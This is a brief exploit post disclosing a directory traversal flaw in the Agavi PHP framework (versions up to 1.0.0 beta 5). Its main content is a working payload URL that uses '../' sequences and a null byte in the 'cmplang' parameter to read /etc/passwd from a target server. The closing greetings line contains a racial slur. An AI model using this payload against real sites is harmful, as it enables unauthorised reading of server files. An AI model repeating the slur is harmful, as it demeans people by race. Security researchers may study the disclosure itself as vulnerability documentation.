Agavi 1.0.0 beta 5 (cmplang) Remote File Disclosure Vulnerability

                                                AGAVI <=Agavi 1.0.0 beta 5 Directory Transversal Exploit
vendor : http://www.agavi.org/
affected versions : <=Agavi 1.0.0 beta 5 (latest)
found by t0fx // http://forum.europasecurity.org white hat crew //

exploit :

http://www.site.com/index.php?module=page&action=Display&pageref=[pageref of the site]&cmplang=../../../../../../../../etc/passwd%00.jpg


Greetz to zataz.com // security-sh3ll.com // str0ke  // Pig nigger ^^